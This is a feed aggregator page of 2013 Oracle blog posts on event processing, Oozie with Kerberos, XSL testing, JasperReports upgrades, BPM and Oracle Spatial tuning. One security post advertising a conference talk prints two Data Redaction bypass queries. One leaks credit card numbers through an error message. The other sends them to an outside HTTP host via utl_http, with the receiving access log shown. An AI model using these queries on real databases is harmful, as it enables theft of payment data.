Feed aggregator

Role and Tool for Real Time Processing in IoT

Anshu Sharma - Fri, 2013-11-22 13:34

Everyone acknowledges that IoT will improve our productivity by automating mundane tasks like getting relevant information from a machine to a Cloud Service for Repair or Replenishment. Large numbers of folks also agree that Big Data has an important role to play. For example, crunching data from hundreds of sensors in a turbine and predicting failures. However, relatively less number of folks understand the role of Real Time processing in Internet of Things. After all if I have the ability to reduce my usage based automobile insurance premium, I would appreciate if instead of sending a monthly report I can get an alert to change my behavior while I am still in the middle of my long drive.

If Real Time Processing of data was difficult in simple transactional systems, consider the complexity when you are dealing with streaming data plus you have to combine multiple data sources like information of my trip and the data coming in constantly from the Telematics module in my car. So you have to learn a new tool. While you might be familiar with Hadoop, you should familiarize yourself with Storm. Storm makes it easy to reliably process unbounded streams of data, doing for realtime processing what Hadoop did for batch processing.

Oracle's solution for building application to process streaming data in real time is Oracle Event Processing. Oracle also offers a lighter weight version of OEP for Embedded Development on ARM and x86 devices. Such devices include Home Automation Gateways, Smart Meter Aggregators, Healthcare Hubs, Industrial Gateways. Yes, if you can take decision without needing any more data from the backend, then why not do it at the Gateway/Aggregator level and not send all the streaming data back to the data center. You might still need to send the data back for other use cases, but at least your real time decision making latency is reduced considerably. 

So what are the strengths of OEP. Here are some key points - 

1) OEP provides infrastructure and guidelines for developers to create scalable and highly available Event processing networks (EPN).

2) OEP provides out of the box Adapters for easily consuming data coming in different protocols and formats. Of course you are free to write your own adaptors.

3) Oracle CQL is a rich formalized Query Language optimized for concise expression of temporal queries similar to how SQL is optimized for expression of static data queries. Out of the box functions augment the core language. 

4) Oracle CQL is augmented by data cartridge framework allowing you to tightly integrate other domain data types and functions. Following Data Cartridges are available – Oracle Java, Oracle Spatial, Oracle JDBC, Hadoop. Oracle JDBC cartridge allows you to write applications merging streaming data with geo fencing functions available from Oracle Spatial or predictive analytics capabilities of Oracle Advanced Analytics.

5) Pre integration with Oracle Coherence for local and distributed cache. You can integrate a cache system with your Oracle Event Processing application so that the cache is available as source or destination for data your application uses, including event data. Integrating a cache can provide access to relatively static data at a speed that is well suited to an application that handles streaming data.

6) Persist the events that flow out of a component of the EPN to a store and then play them back at a later stage. This helps debug a problem with a currently running application. If you have been recording the events at a node in the EPN when the problem occurred, you can later playback the same list of events to recreate the problem scenario for debugging purposes.

7) OEP Visualizer is a rich Web 2.0 application that displays OEP Data in a useful and intuitive way for admins e.g. latency and throughput graphs display the amount of time it takes an event to pass through the specified stage or path in the EPN or the number of events passing through, respectively. EPN Configurations can be changed through the Visualizer. All this can also be done programmatically through available JMX APIs.

8) OEP architecture is highly modular based on OSGi. Adapters and other components involved in implementing data feeds can be dynamically configured/activated/suspended via a lifecycle API (SuspendableBean, ResumableBean). Changes can be made dynamically to CQL queries. In business implementations, business rules are very dynamic. This also limits testing required for changes.

9) OEP integrates well with Oracle SOA.  It is available as a part of Oracle SOA Suite and can be used in SOA Composites. 

So explore the role of real time processing in your IoT application with OEP and share with us what cool application you came up with. Fast Data enabled by OEP brings more value to high velocity sensor/device data. This enables new services, better customer experience, improved efficiency, higher quality in operations.

Using Oozie in Kerberized Cluster

Chen Shapira - Fri, 2013-11-22 09:14

In general, most Hadoop ecosystem tools work rather transparently in a kerberized cluster. Most of the time things “just work”. This includes Oozie. Still, when things don’t “just work”, they tend to fail with slightly alarming and highly ambiguous error messages. Here are few tips for using Oozie when your Hadoop cluster is kerberized. Note that this is a client/user guide. I assume you already followed the documentation on how to configure the Oozie server in the kerberized cluster (or you are using Cloudera Manager, which magically configures it for you).

    1. As always, use “kinit” to authenticate with Kerberos and get your tgt before trying to run oozie commands. Verify with klist. Failure to do this will result in “No valid credentials provided (Mechanism level: Failed to find any Kerberos tgt)”
    2. I always enable security debug messages. This helps me troubleshoot, and also helps when I need to ask support/mailing list for help.
      export HADOOP_ROOT_LOGGER=TRACE,console;
      export HADOOP_JAAS_DEBUG=true;
      export HADOOP_OPTS="-Dsun.security.krb5.debug=true"
    3. Your Oozie command typically contains a URL. Something like “oozie -url http://myserver:11000/oozie -conf job.properties -run” The server name in the URL must match an existing principal name in Kerberos. If your principals are actually “myserver.mydomain.com” make sure you use that in the URL.
    4. If you decide to use CURL to connect to your Oozie server, either for troubleshooting or for using the REST API, don’t forget to use “–negotiate -u foo:bar”. The actual username and password don’t matter (you are authenticating with your Kerberos ticket), but CURL throws a fit if they don’t exist.
    5. If you have Hive action in your Oozie workflow, you need to define and use credentials. Here’s an example:
      <workflow-app xmlns="uri:oozie:workflow:0.2.5" name="example-wf">
              <credentials>
                      <credential name='hive_credentials' type='hcat'>
                              <property>
                                  <name>hcat.metastore.uri</name>
                                  <value>thrift://metastore_server:9083</value>
                              </property>
                              <property>
                                  <name>hcat.metastore.principal</name>
                                  <value>hive/_HOST@KERBDOM.COM</value>
                              </property>
                      </credential>
              </credentials>
      <start to="hive-example"/>
      <action name="hive-example" cred="hive_credentials">
              <hive xmlns="uri:oozie:hive-action:0.2">
                      <job-tracker>${jobTracker}</job-tracker>
                      <name-node>${nameNode}</name-node>
                      <job-xml>${hiveSiteXML}</job-xml>
                      <script>${dbScripts}/hive-example.hql</script>
              </hive>
              <ok to="end"/>
              <error to="fail"/>
      </action>
      <kill name="fail">
              <message>Workflow failed, error message[${wf:errorMessage(wf:lastErrorNode())}]</message>
      </kill>
      <end name="end"/>
      </workflow-app>
      
    6. To make step #5 actually work (i.e. allow Oozie to run Hive actions), you will also need to do the following:
      In CM:
    7. go to “HDFS Service->Configuration->Service-Wide->Advanced->Cluster-wide Configuration Safety Valve for core-site.xml” and add:

      <property>
      <name>hadoop.proxyuser.oozie.hosts</name>
      <value>*</value>
      </property>
      <property>
      <name>hadoop.proxyuser.oozie.groups</name>
      <value>*</value>
      </property>
      

      – go to “Oozie service->Configuration->Oozie Server(default)->Advanced-> Oozie Server Configuration Safety Valve for oozie-site.xml” and add:

      <property>
      <name>oozie.credentials.credentialclasses</name>
      <value>hcat=org.apache.oozie.action.hadoop.HCatCredentials</value>
      </property>
      

      – Deploy client configuration and restart Hive service and Oozie service.

    8. Oozie doesn’t kinit a user for you on the node its launching the action on, and it doesn’t move principles and tickets around. Instead it uses delegation tokens. If you want to authenticate to Hadoop inside a shell or java action, you’ll need to use the same tokens.

      In a shell action, it will be something like:

      if [ -z ${HADOOP_TOKEN_FILE_LOCATION} ]
      then
      	hive -e "select x from test" -S
      else
      	hive -e "SET mapreduce.job.credentials.binary=$HADOOP_TOKEN_FILE_LOCATION; select x from test" -S
      fi
      

      In Java it will be:

      if (System.getenv("HADOOP_TOKEN_FILE_LOCATION") != null) {
                  jobConf.set("mapreduce.job.credentials.binary", System.getenv("HADOOP_TOKEN_FILE_LOCATION"));
      }
      

    Hope this helps! Feel free to comment with questions, especially if you ran into errors that I did not address. I’ll be happy to add more tips to the list.


Categories: DBA Blogs

Best of Oracle Security 2013

Alexander Kornbrust - Fri, 2013-11-22 01:51

I just uploaded my DOAG 2013 presentation „Best of Oracle Security 2013„.

 

This presentation shows how to bypass Oracle Data Redaction, become DBA using CREATE ANY INDEX, Hide information from Oracle Auding using VPD and more…

—————————————————

SQL> select * from scott.credit_card where 1=ordsys.ord_dicom.getmappingxpath((card_id),user,user);

ERROR at line 1:

ORA-53044: invalid tag: 1234-1234-1234-1234
ORA-06512: at „ORDSYS.ORDERROR“, line 5
ORA-06512: at „ORDSYS.ORD_DICOM_ADMIN_PRV“, line 1394
ORA-06512: at „ORDSYS.ORD_DICOM_ADMIN_PRV“, line 479
ORA-06512: at „ORDSYS.ORD_DICOM_ADMIN_PRV“, line 8232
ORA-06512: at „ORDSYS.ORD_DICOM“, line 756
ORA-06512: at line 1

 

or

 

select * from credit_card where 1=length(utl_http.request(‚http://192.168.2.102:8080/’||card_id));

==> bypassing the obfuscation because the utl_http.request is located in the where clause

 

——– output from access.log ————

192.168.2.101 – – [13/Sep/2013:15:19:20 Central Europe Daylight Time] „GET /1234-1234-1234-1234 HTTP/1.1″ 404 35 – –

192.168.2.101 – – [13/Sep/2013:15:19:20 Central Europe Daylight Time] „GET /5678-5678-5678-5678 HTTP/1.1″ 404 35 – –

——– output from access.log ————

—————————————————

 

Desktop Testing XSL

Tim Dexter - Thu, 2013-11-21 23:05

Bit of a corner case this week but I wanted to park this as much for my reference as yours. Need to be able to test a pure XSL template against some sample data? Thats an XSL template that is going to generate HTML, Text or HTML. The Template Viewer app in the BI Publisher Desktop group does not offer that as an option. It does offer XSL-FO proccesing thou.

A few minutes digging around in the java libraries and I came up with a command line solution that is easy to set up and use.

1. Place your sample XML data and the XSL template in a directory
2. Open the lib directory where the TemplateViewer is installed. On my machine that is d:\Oracle\BIPDesktop\TemplateViewer\lib
3. Copy the xmlparserv2.jar file into the directory created in step 1.
4. Use the following command in a DOS/Shell window to process the XSL template against the XML data.

java -cp ./xmlparserv2.jar oracle.xml.parser.v2.oraxsl fileX.xml fileY.xsl > fileX.xls


The file generated will depend on your XSL. For an Excel output, you would instruct the process to generate fileX.xls in the same folder. You can then test the file with Excel, a browser or a text editor. Now you can test on the desktop until you get it right without the overhead of having to load it to the server each time.

To be completely clear, this approach is for pure XSL templates that are designed to generate text, html or xml. Its not for the XSLFO templates that might be used at runtime to generate PDF, PPT, etc. For those you should use the Template Viewer application, it supports the XSLFO templates but not the pure XSL templates.

If your template still falls into the pure XSL template category. This will be down to you using some BIP functionality in the templates. To get it to work you'll need to add in the Publisher libraries that contain the function e.g. xdo-core.jar, i18nAPI_v3.jar, etc to the classpath argument (-cp.)

So a new command including the required libraries might look like:

java -cp ./xmlparserv2.jar;./xdo-core.jar;./i18nAPI_v3.jar 
                            oracle.xml.parser.v2.oraxsl fileX.xml fileY.xsl > fileX.xls

 You will need to either move the libraries to the local directory, my assumption above or include the full path to them. More info here on setting the -cp attribute.

Categories: BI & Warehousing

Save $250 on Kscope14 Registration Now!

Tim Tow - Thu, 2013-11-21 17:17
If you work in the Essbase, Oracle EPM, or Oracle BI world, *the* place to be every June is the annual Kscope conference.  Registration is open for the next conference, Kscope14, coming next June in Seattle, WA.  If you are not currently a full ODTUG member, let me tell you how you can save $250 on the $1650 registration fee.

There are two steps you have to take to "save big".  First, become a full member of ODTUG for $99 and enjoy all of the benefits, including access to a members-only presentations library, throughout the year.  Next, register for Kscope14 and you are eligible for the members-only price of $1500 for a savings of $150.  While you are registering, simply use the code AOLAP to get an additional $100 discount!

My company, Applied OLAP, is one of top-tier Platinum Sponsors of Kscope14 and I will be there.  I hope to see you at the conference and, if you were able to save some money by using our exclusive AOLAP code, be sure to stop our booth, say hello, and learn how the Dodeca Spreadsheet Management System can help your company reduce spreadsheet risk, increase spreadsheet accuracy, and reduce costs.
Categories: BI & Warehousing

Upgrading the JasperReports libraries to 5.2.0

Dietmar Aust - Thu, 2013-11-21 09:41
Would you like to upgrade your existing JasperReportsIntegration with the 5.2.0 libraries of JasperReports?

As of now this already seems to be not the most current version, JasperReports has already moved on to 5.5.0. But since I have already created the 5.2.0 package a while ago, I might just post the instructions here. The 5.5.0 version will follow.

Here you go ...

This is an updated version of the original instructions found here: http://daust.blogspot.de/2013/01/upgrading-jasperreports-libraries-to-501.html

Step 1: Download the libary files for 5.2.0
You can download the files here:


 Step 2: Shutdown the Apache Tomcat J2EE server Step 3:  Remove the existing JasperReportsLibraries from your existing installation
Typically, after you have installed your previous version of the JasperReportsIntegration toolkit on your Apache Tomcat J2EE server, the files will be located in the directory $CATALINA_HOME/webapps/JasperReportsIntegration/WEB-INF/lib, for example version 4.7.0 of JasperReports, where $CATALINA_HOME represents the path to your installation of Tomcat.

Then you would have to remove these libraries first. In this directory you should find two files for removal: _jasper-reports-delete-libs-4.7.0.sh and _jasper-reports-delete-libs-4.7.0.cmd, for *nix or Windows respectively. For *nix systems you would have to make it executable, though, e.g.: chmod u+x _jasper-reports-delete-libs-4.7.0.sh . Then you can call it and it will remove all files for version 4.7.0. But it will NOT remove the file for the JasperReportsIntegration and all other libraries which YOU might have placed there deliberately.

You can always find the required removal scripts here: http://www.opal-consulting.de/downloads/free_tools/JasperReportsLibraries/ .

Whenever I release another package, the removal scripts for that package will be shipped as well.

Step 4: Install the new 5.2.0 libraries
Now you can just copy the new libraries from JasperReportsLibraries-5.2.0.zip into $CATALINA_HOME/webapps/JasperReportsIntegration/WEB-INF/lib.
 Step 5: Start the Apache Tomcat J2EE server again
Now you system should be upgraded to the most current JasperReports 5.2.0 !

Just drop me a note when you need updated libraries for a later JasperReports version, etc. I have scripts in place to create a new package of the libraries.

Here you can find the notes from my upgrade (4.5.0 => 4.8.0) on Linux to illustrate the process, I hope it makes sense:

**
** download the libraries from:
**  http://www.opal-consulting.de/downloads/free_tools/JasperReportsLibraries/4.8.0/JasperReportsLibraries-4.8.0.zip
** to /home/jasper/JasperReportsLibraries

cd /home/jasper
mkdir JasperReportsLibraries

** unzip them
cd JasperReportsLibraries
unzip JasperReportsLibraries-4.8.0.zip -d JasperReportsLibraries-4.8.0

** stop tomcat server
/home/jasper/tomcat/bin/shutdown.sh

** remove libraries of current jasper reports release
cd /home/jasper/tomcat/webapps/JasperReportsIntegration/WEB-INF/lib
chmod +x _jasper-reports-delete-libs-4.5.0.sh
dos2unix _jasper-reports-delete-libs-4.5.0.sh

./_jasper-reports-delete-libs-4.5.0.sh

** copy libraries of the new release to the WEB-INF/lib directory
cp /home/jasper/JasperReportsLibraries/JasperReportsLibraries-4.8.0/* /home/jasper/tomcat/webapps/JasperReportsIntegration/WEB-INF/lib

** restart tomcat
/home/jasper/tomcat/bin/startup.sh


Cheers,
~Dietmar.

How to Make File-Based MDS in JDeveloper Work for both Windows and Linux

Jan Kettenis - Wed, 2013-11-20 10:52
In this article I explain how you  can modify the JDeveloper adf-config.xml file to make it work for both Windows, as well as Linux.

If in a JDeveloper application you point to artifacts in a file based MDS residing in a Windows folder for example "d:\projects\MDS", then JDeveloper will create an new entry in the adf-config.xml file (that you can find in Application Resources -> Descriptors -> ADF META-INF) pointing to the absolute location of that folder:



The problem with this is that if you have other colleagues that use Linux instead of Window, it's not possible to make it work for both by defining some relative location (as you could do with ant), like "../../projects/MDS", so now what?

As in most cases, the solution is so simple that I successfully missed it many times: use an environment variable! What worked was creating an environment variable with name MDS_HOME, and after that I could use it like this:

Problem solved! Such an evironment variable you can create in Windows as well as Linux.

I have not yet fully tested if this works for everything, like deploying with ant, but if it doesn't I expect you can easily fix that by modifying the ant-sca-compile.xml file in your JDeveloper installation folder by adding a property "mds_home" in there as well.

Customizing (or rather Hacking) Oracle BPM 11g Business Exceptions

Jan Kettenis - Wed, 2013-11-20 02:05
In this article I explain how you can add custom attributes to Oracle BPM 11g business exceptions. Mind that this is not officially supported.

One of the fun things of giving a training like the Advanced BPM Suite 11g course that I'm running now, is that students ask questions to which you don't know the answer. But hey, you are the teacher, and that won't do, so off you go!

One question asked yesterday was if it is possible to have more attributes on a business exception than just "errorInfo". First question should be: "why do you want that?". Well, let's assume that you at some higher level you want to have access to context information that is only available where the exception is thrown, like a local variable. Of course you can concatenate all info in one long semi-colon separated string or something, but then you probably have to have other logic to transfer that back into something readable.

If you look closely at the definition of a business exception, you will notice that it uses a generated WSDL and XSD. What I did was adding an extra element "name" to the XSD of a business exception with name FailProcess (created for the previous blog article) as follows:


I then restarted JDeveloper to see what would happen, and not totally to my surprise: nothing! As in: it works! I also tried it run-time, and no problem there either, as you can see in the following figure:


One warning though. As the generated XSD clearly states, it should not be altered manually, and any change may be overwritten. It obviously is not a supported hack I show you here, and you should expect that any change of the business exception via the UI will break your code. Therefore let's hope that changes like this in some next version are supported by JDeveloper as well.

Why you may consider NOT using the Terminate End Event in Oracle BPM Suite

Jan Kettenis - Tue, 2013-11-19 10:47
In this article I explain why you should try to avoid using the Terminate End Event in Oracle BPM 11g.

According to the BPMN specification, the Terminate End Event is supposed to terminate a process instance at the level at which it is raised, including any ongoing activity for sub-processes. But is should not terminate any higher level (parent) process.

With OBPM 11g it works differently (at least up to PS6), as raising a Terminate End Event will actually terminate the composite's instance. Except for human tasks, because as clearly stated in the documentation: "Human tasks are independent from BPMN processes. If you terminate a BPMN process while it runs a user task, the associated human tasks keeps running independently". The reason is that the human workflow engine runs separately from the BPM engine.

In the process below this will result in the situation that the Review Data task will still show in Workspace, while the associated process instance is already terminated. That was not the original intention of this model.


This flow shows what actually happens:


Conclusion: before considering using the Terminate End Event be well aware of its behavior. Consider alternate types of modeling, like raising a business exception that is caught by the parent process, which then uses an Update Task activity to withdraw all human tasks before actually ending. In this way you can prevent any human doing accidentally doing work for nothing.

Such a model would look like this:


Resizing MGMT_TABLESPACE in Grid Control 12c

Bas Klaassen - Mon, 2013-11-18 07:06
We noticed the MGMT_TABLESPACE in our 12c Grid Control instance was very big. Almost 380gb of data was stored in this tablespace. Because of all the targets registered in this Grid Control instance and the frequent usage of this Grid Control, I did not think anything was wrong. Untill someone looked into this and found out it was a bug in 12c... Note 1502370.1 describes this bug and also the Bas Klaassenhttp://www.blogger.com/profile/04080547141637579116noreply@blogger.com34
Categories: APPS Blogs

A day in Kunming China

Arvind Jain - Sun, 2013-11-17 09:08
Kunming is a important location for transit passengers traveling via China Eastern.I had a unplanned 24 hour stay and I am glad that I found a reasonable accommodation. So for those that are looking for simple, straightforward transit stay in Kunming,  Dhaka Hotel Ph# 135 2933 2392 is a good option if you are within a budget. They have WiFi, Airport Transfer and South Asian food options.

Creating your own Virtualbox Development Images

Edwin Biemond - Sat, 2013-11-16 15:11
For my Oracle Puppet provisioning development I can't do without these create image tools: Packer and Vagrant in combination with Oracle VirtualBox or VMware.  In this blogpost I will explain what these tools can do for you and how you can make your own images and use puppet as provisioning tool. With Vagrant you can create your own virtual images and it can start puppet or chef to do all the

Playing with Oracle Spatial - An important consideration when using SDO_NN operator

Mihajlo Tekic - Fri, 2013-11-15 23:27

I've been playing with Oracle Spatial quite a bit lately and ran into some interesting things that I  plan to write about in the next couple of posts.

This post covers an important consideration, I think, one should make when using SDO_NN spatial operator with sdo_num_res parameter.

But first, just briefly on the operator itself. SDO_NN operator is used to identify the nearest neighbors for a particular geometry. The full operator synopsis can be found in the official documentation

Please note, the database I use in the examples below is Oracle 11.2.0.3.0 Enterprise Edition with no additional patches applied and default Oracle Spatial settings.

Let's consider the following example, there is a table RESTAURANTS having only an id and a geometry column (point).

 CREATE TABLE restaurants
(
id NUMBER NOT NULL,
point MDSYS.SDO_GEOMETRY
);

ALTER TABLE restaurants ADD CONSTRAINT restaurants_pk PRIMARY KEY (id);


Let's create a spatial index on restaruants.point column:

 INSERT INTO user_sdo_geom_metadata 
( TABLE_NAME
, COLUMN_NAME
, DIMINFO
, SRID)
VALUES
( 'restaurants'
, 'POINT'
, SDO_DIM_ARRAY(
SDO_DIM_ELEMENT('X', 0, 10000000, 0.005),
SDO_DIM_ELEMENT('Y', 0, 10, 0.005)
)
, null -- SRID
);

CREATE INDEX restaurants_sidx ON restaurants(point) INDEXTYPE IS MDSYS.SPATIAL_INDEX;


For simplicity let's say there are 500,000 restaurants distributed on a single line (x-axis of two dimensional coordinate system, y=0, x=1,2,3,...500,000).

INSERT INTO restaurants 
(SELECT rownum --id
, SDO_GEOMETRY(
2001 -- 2 dimensional point
, null -- SDO SRID
, SDO_POINT_TYPE(rownum,0,null) –-x=rownum, y=0
, null
, null
)
FROM dual CONNECT BY rownum<=500000
);

In order to find the first 5 nearest neighbors to point (10,0) one could use the following spatial query:

SQL> SELECT p.id, sdo_nn_distance(1) distance
2 FROM restaurants p
3 WHERE SDO_NN(p.point,
4 SDO_GEOMETRY(
5 2001 -- 2 dimensional point
6 , null
7 , SDO_POINT_TYPE(10,0,null)
8 , null
9 , null
10 ),
11 'sdo_num_res=5',
12 1
13 )='TRUE'
14* ORDER BY 2;

ID DISTANCE
---------- ----------
10 0
9 1
11 1
12 2
8 2

SQL>

Now suppose each restaurant has 5 menu items that are stored in MENU_ITEMS table. The table has 4 columns, a unique identifier ID; a reference to RESTAURANTS table, rest_id; an identifier that identifies an item within the restaurant menu, item_number; and lastly a description, 100 characters long column that I use in this example to make this table a bit bigger.

CREATE TABLE menu_items
(id NUMBER NOT NULL,
rest_id NUMBER NOT NULL,
item_number NUMBER NOT NULL,
description varchar2(100)
);

ALTER TABLE menu_items ADD CONSTRAINT menu_items_pk PRIMARY KEY (id);

ALTER TABLE menu_items ADD CONSTRAINT menu_items_rest_FK FOREIGN KEY (rest_id) REFERENCES restaurants(id);

CREATE INDEX menu_items_rest_idx ON menu_items(rest_id);


INSERT INTO menu_items
(SELECT rownum
, b.rn
, a.rn
, rpad(rownum,100,'A')
FROM
(SELECT rownum rn FROM dual CONNECT BY rownum<=5) a, --5 menu items per rest.
(SELECT rownum rn FROM dual CONNECT BY rownum<=500000) b
);

commit;

Suppose you want to get the menu items of the top 5 nearest restaurants to a particular location (10,0) for an example. One way would be with the following spatial query (but first of course collect the necessary stats):

BEGIN
DBMS_STATS.GATHER_TABLE_STATS(ownname=>user,tabname=>'restaurants',cascade=>TRUE);
DBMS_STATS.GATHER_TABLE_STATS(ownname=>user,tabname=>'menu_items',cascade=>TRUE, method_opt=>'FOR ALL INDEXED COLUMNS SIZE AUTO');
END;

SELECT t1.id
, t2.id
, t2.restaurants_id
, t2.item_number
FROM restaurants t1
, menu_items t2
WHERE t1.id=t2.restaurants_id
AND SDO_NN(t1.point,
SDO_GEOMETRY(
2001 -- 2 dimensional point
, null
, SDO_POINT_TYPE(10,0,null)
, null
, null
),
'sdo_num_res=5',
1
)='TRUE'
ORDER BY t1.id, t2.item_number;


The query produces the desired result. However, let's look how it performed. I re-run the query, but this time I used gather_plan_statistics hint to get the execution statistics for the query.

SQL>SELECT /*+ gather_plan_statistics */ t1.id, t2.id, t2.restaurants_id, t2.item_number
2 FROM restaurants t1
3 , menu_items t2
4 WHERE t1.id=t2.restaurants_id
5 AND SDO_NN(t1.point,
6 SDO_GEOMETRY(
7 2001 -- 2 dimensional point
8 , null
9 , SDO_POINT_TYPE(10,0,null)
10 , null
11 , null
12 ),
13 'sdo_num_res=5',
14 1
15 )='TRUE'
16 ORDER BY t1.id, t2.item_number;

ID ID RESTAURANTS_ID ITEM_NUMBER
---------- ---------- -------------- -----------
8 8 8 1
8 500008 8 2
8 1000008 8 3
8 1500008 8 4
8 2000008 8 5
9 9 9 1
9 500009 9 2
9 1000009 9 3
9 1500009 9 4
9 2000009 9 5
10 10 10 1
10 500010 10 2
10 1000010 10 3
10 1500010 10 4
10 2000010 10 5
11 11 11 1
11 500011 11 2
11 1000011 11 3
11 1500011 11 4
11 2000011 11 5
12 12 12 1
12 500012 12 2
12 1000012 12 3
12 1500012 12 4
12 2000012 12 5

25 rows selected.


The query took 1.32 seconds to complete as you can see from the execution statistics:

SQL> SELECT * FROM TABLE(dbms_xplan.display_cursor(null,null,'ALLSTATS LAST'));

PLAN_TABLE_OUTPUT
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
SQL_ID gwpqub3k0awqm, child number 0
-------------------------------------
SELECT /*+ gather_plan_statistics */ t1.id, t2.id, t2.restaurants_id,
t2.item_number FROM restaurants t1 , menu_items t2 WHERE
t1.id=t2.restaurants_id AND SDO_NN(t1.point, SDO_GEOMETRY(
2001 -- 2 dimensional point , null ,
SDO_POINT_TYPE(10,0,null) , null , null ),
'sdo_num_res=5', 1 )='TRUE' ORDER BY t1.id, t2.item_number

Plan hash value: 2076547507


PLAN_TABLE_OUTPUT
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------------
| Id | Operation | Name | Starts | E-Rows | A-Rows | A-Time | Buffers | Reads | OMem | 1Mem | Used-Mem |
------------------------------------------------------------------------------------------------------------------------------------------------
| 0 | SELECT STATEMENT | | 1 | | 25 |00:00:01.32 | 41540 | 41465 | | | |
| 1 | SORT ORDER BY | | 1 | 24678 | 25 |00:00:01.32 | 41540 | 41465 | 2048 | 2048 | 2048 (0)|
|* 2 | HASH JOIN | | 1 | 24678 | 25 |00:00:01.32 | 41540 | 41465 | 1517K| 1517K| 886K (0)|
| 3 | TABLE ACCESS BY INDEX ROWID| RESTAURANTS | 1 | 5000 | 5 |00:00:00.01 | 64 | 0 | | | |
|* 4 | DOMAIN INDEX | RESTAURANTS_SIDX | 1 | | 5 |00:00:00.01 | 63 | 0 | | | |
| 5 | TABLE ACCESS FULL | MENU_ITEMS | 1 | 2500K| 2500K|00:00:00.62 | 41476 | 41465 | | | |
------------------------------------------------------------------------------------------------------------------------------------------------


PLAN_TABLE_OUTPUT
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Predicate Information (identified by operation id):
---------------------------------------------------

2 - access("T1"."ID"="T2"."RESTAURANTS_ID")
4 - access("MDSYS"."SDO_NN"("T1"."POINT","MDSYS"."SDO_GEOMETRY"(2001,NULL,"SDO_POINT_TYPE"(10,0,NULL),NULL,NULL),'sdo_num_res=5',1)='
TRUE')


29 rows selected.

SQL>


The problem

Well, one could say that 1.32 seconds is not that bad. However, if you look at the plan more carefully you can notice that CBO used a HASH JOIN method to join RESTAURANTS and MENU_ITEMS tables and as a result it performed full table scan on MENU_ITEMS table. Now imagine if MENU_ITEMS table was quite big (suppose you have stored the items of all restaurants across US)?!

What made CBO to pick a HASH JOIN? Look at the estimated (5,000) vs. actual rows (5) selected from RESTAURANTS table. We were only after the 5 nearest neighbors. We used sdo_num_res=5 in our SDO_NN call. One could expect that CBO would recognize that fact and estimate cardinality of 5. But, no, CBO applied selectivity of 1% (500,000 restaurants x 1% = 5,000)

Why selectivity of 1%?

SDO_NN is an operator that is bound to the implementation of the function NN that is part of PRVT_IDX package owned by MDSYS.

By default, statistics for PRVT_IDX package is defined by SDO_STATISTICS type. That is Extensible Optimizer feature is used to define how cardinality and the cost will be calculated for functions/procedures defined in the package. (if statistics are not associated, CBO uses default selectivity of 1%)

Seems like the logic implemented in ODCIStatsSelectivity() function is not good enough to detect that we are only after the first N rows, as defined with SDO_NUM_RES parameter.

You can clearly see this if you create 10053 trace file in the section where MDSYS.SDO_STATISTICS.ODCIStatsSelectivity procedure is used to calculate selectivity.



MDSYS.SDO_STATISTICS.ODCIStatsFunctionCost returned:
CPUCost : 100000000000000
IOCost : 100000000000000
NetworkCost : -1
Calling user-defined selectivity function...
predicate: "MDSYS"."SDO_NN"("T1"."POINT","MDSYS"."SDO_GEOMETRY"(2001,NULL,"SDO_POINT_TYPE"(10,0,NULL),NULL,NULL),'sdo_num_res=5',1)='TRUE'
declare
sel number;
obj0 "MDSYS"."SDO_GEOMETRY" := "MDSYS"."SDO_GEOMETRY"(NULL, NULL, NULL, NULL, NULL);

begin
:1 := "MDSYS"."SDO_STATISTICS".ODCIStatsSelectivity(
sys.ODCIPREDINFO('MDSYS',
'PRVT_IDX',
'NN',
45),
sel,
sys.ODCIARGDESCLIST(sys.ODCIARGDESC(3, NULL, NULL, NULL, NULL, NULL, NULL), sys.ODCIARGDESC(3, NULL, NULL, NULL, NULL, NULL, NULL), sys.ODCIARGDESC(2, 'RESTAURANTS', 'TEST', '"POINT"', NULL, NULL, NULL), sys.ODCIARGDESC(3, NULL, NULL, NULL, NULL, NULL, NULL), sys.ODCIARGDESC(3, NULL, NULL, NULL, NULL, NULL, NULL)),
:3,
:4
, obj0, "MDSYS"."SDO_GEOMETRY"(2001,NULL,"SDO_POINT_TYPE"(10,0,NULL),NULL,NULL), :5,
sys.ODCIENV(:6,:7,:8,:9));
if sel IS NULL then
:2 := -1.0;
else
:2 := sel;
end if;
exception
when others then
raise;
end;
Bind :3 Value 'TRUE'
Bind :4 Value 'TRUE'
Bind :5 Value 'sdo_num_res=5'
ODCIEnv Bind :6 Value 0
ODCIEnv Bind :7 Value 0
ODCIEnv Bind :8 Value 0
ODCIEnv Bind :9 Value 3
MDSYS.SDO_STATISTICS.ODCIStatsSelectivity returned selectivity: 1.00000000%
Table: RESTAURANTS Alias: T1
Card: Original: 500000.000000 Rounded: 5000 Computed: 5000.00 Non Adjusted: 5000.00




If statistics are not associated CBO would also use selectivity of 1%. So what is the differences? Under what circumstances one could take advantage of the extensible optimizer feature and generate better selectivity when SDO_NN operator is used along with sdo_num_res parameter? I couldn't find any article or documentation piece that will help me answer these questions.

What I do know however, is that it shouldn't be that difficult to implement a piece of logic that will make SDO_STATISTICS.ODCIStatsSelectivity procedure generate more accurate numbers.

As a matter of fact, I played a bit with this.

Disclaimer: Please be aware the following examples are for demonstration purposes only and shouldn't be used in an actual, supported, database environment. The logic I show below is quite simple and is for illustration only. Please contact Oracle Support if you want to implement something similar in your environment.

I created a simple type named SDO_STATISTICS_CUSTOM under MDSYS schema using the Extensible Optimizer interface (link)

I implemented ODCIStatsSelectivity procedure as shown below (one more time, this implementation is to demonstrate that with appropriate logic ODCIStatsSelectivity can return desired values):



STATIC FUNCTION ODCIStatsSelectivity (
pred_info IN SYS.ODCIPredInfo,
sel OUT NUMBER,
args IN SYS.ODCIArgDescList,
p_start IN VARCHAR2,
p_stop IN VARCHAR2,
geometry1 IN MDSYS.SDO_GEOMETRY,
geometry2 IN MDSYS.SDO_GEOMETRY,
param IN VARCHAR2,
env IN SYS.ODCIEnv
) RETURN NUMBER IS
BEGIN

*******************
if param=NULL then
sel:=1;
else if lower(substr(param,1,instr(param,'=')-1)) = 'sdo_num_res' then
SELECT decode(num_rows,null,1,
decode(to_number(trim(substr(param,instr(param,'=')+1))),0,1,to_number(trim(substr(param,instr(param,'=')+1)))/num_rows)*100
)
INTO sel
FROM dba_tables where owner=args(3).TABLESCHEMA and table_name=args(3).TABLENAME;

if sel>100 then
sel:=100 ;
end if;

end if;
end if;

****************

RETURN ODCIConst.success;
END ODCIStatsSelectivity;



